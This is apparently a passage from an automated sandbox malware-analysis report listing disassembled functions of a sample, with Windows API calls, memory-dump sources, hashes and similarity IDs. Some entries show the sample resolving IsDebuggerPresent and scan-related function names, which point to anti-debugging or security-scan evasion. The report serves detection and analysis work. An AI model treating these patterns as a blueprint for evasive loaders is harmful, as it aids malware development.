                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f431a3974dc635bfac2972322751ac58c5fe2f17dc44378784428defc6847c8c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc04f3f8a9889c79e6c91d2bb17913fe65ff3e4e5c63878edd36dda831a90dea
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF09671A84704AFE742FFB4DD8195AFBEDE74D74075284E0BA00D3650DE34AF149A64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,?,02B0FAEB,UacInitialize,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,Initialize), ref: 02B0F6EE
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B0F700
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-2367923768
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e246f6d40f49c2d1697ab5aed7e032244630d3d76323e65d2cd33a1496223a9d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a02f4710a06bffd95faef7b05dc23389751e2f08cb18a9209d1b206c21e7fd2f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e246f6d40f49c2d1697ab5aed7e032244630d3d76323e65d2cd33a1496223a9d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAD012B139035019BE5576F81CC4829078C9B5492D3240EA0B232C64F2EEAAA8155116
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B1D10B,00000000,02B1D11E), ref: 02AFC47A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02AFC48B
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6de396e573cfbf20296975e737805fa6ae182fad675897f0b9546daac9c7487c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 67722898a4825b992b50481ec4d23245eb9308417640c6a05ecde3ee01e0d2ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6de396e573cfbf20296975e737805fa6ae182fad675897f0b9546daac9c7487c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03D05EA0A8030A6AE7C4EFF258C8631329A9308BA2F408827FB0146101EF7EA450CF14
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02AFE297
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02AFE2B3
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02AFE32A
                                                                                                                                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 02AFE353
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a652fa2ed2ba4e3a27664234f4801bd547a58c461ae5fa83e54bddd66e7b0fd9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97413175A412198FCBA2DB98CE94BC9B3BDAF48304F0041D5F608E7221DA38AF808F54
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02AFAD59
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02AFAD7D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02AF0000,?,00000105), ref: 02AFAD98
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02AFAE2E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 226fde0ddba450bb4fddbd5da74de5a6572a5a1ef07d2368978c50b8ad482e32
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: de61c144e3cbf2837b934592623527f7e946286fdd1cc035533fe0f07016de49
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 226fde0ddba450bb4fddbd5da74de5a6572a5a1ef07d2368978c50b8ad482e32
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26411B71A402589FDBA1DBA8CD84BDAB7FDAB18340F4440E5B648E7242DF789F848F50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02AFAD59
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02AFAD7D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02AF0000,?,00000105), ref: 02AFAD98
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02AFAE2E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b38bd52c52f1b7b252b39cda9abdf244e71b9078a71f517af57261d94956d9da
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 837ac3f324e6020c3e6a32bf9397bd783ddf771094c9298c8d97cfaaf979b013
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b38bd52c52f1b7b252b39cda9abdf244e71b9078a71f517af57261d94956d9da
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E413D71A402589FDBA1DBA8CD84BDAB7FDAB18340F4444E5B648E7242DF789F848F50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cdd8132198bce73d0f5908af240464f9eac99fb8bb0be002af89861b336da66
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e01bb2658bde0beb0cba38a3a553556bb9249fa10e723186e90ec2f4d632b8e2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cdd8132198bce73d0f5908af240464f9eac99fb8bb0be002af89861b336da66
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DA1E6667506008BD758AAFD9DC03BDB2E29BC4365F19423EF31DCB281EF6C89468B50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02AF95DA), ref: 02AF9572
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02AF95DA), ref: 02AF9578
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: yyyy
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c6ef596f3c1782b5b1bd3f97c63d477b3af352d0d9b00c83403908d3bb819cf0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2014f0d82cb7ba9481ae00773d4200b95738bb91baa72454181db7f096585a3a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6ef596f3c1782b5b1bd3f97c63d477b3af352d0d9b00c83403908d3bb819cf0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59214D71A002589FDB90DFE8C981BABB3B9EF49700F5100A5FA45E7250DA389E44CA65
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B08338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B083C2), ref: 02B083A4
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3811539418-184458249
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 38e974fb3b5720e947d7326efa9ff7ba329fab62e1a56cddfce78d96ba10ca61
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8847cc1c3d3ed413c9f5457395e13541aa79c58495eccaab288f79e065f4fb66
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38e974fb3b5720e947d7326efa9ff7ba329fab62e1a56cddfce78d96ba10ca61
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36016271680304AFE741EFE4DC81F6B7BADE74CB40F6184A0BA04D7690DA74AE159B64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF6498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocValue
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: @m
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1189806713-158742394
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b23ce750801bd06def087caef297d8c526d826706ad2b6d6e7a282a361a303ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 282b8a1a01e683bac4a3a39ef43df240dae49d1ae82f8cc1fd595fc261f4755f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b23ce750801bd06def087caef297d8c526d826706ad2b6d6e7a282a361a303ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23C002B0D9170086EB85BBF5A744A06369DAF10F8AB904925BB24CB24DDF3CD414DF51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B0AF58
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B0AF88
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B0AFA7
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B0AFB3
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Read$Write
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3448952669-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 26934a11ac63e753773a246cce3289cc0190955e5e5f99fa10da49542022df94
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C521C0B26403199BCB11DF69CDC0BAE7BA9EF40756F004951FE50D7280DB38E8118BA0

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:3%
                                                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
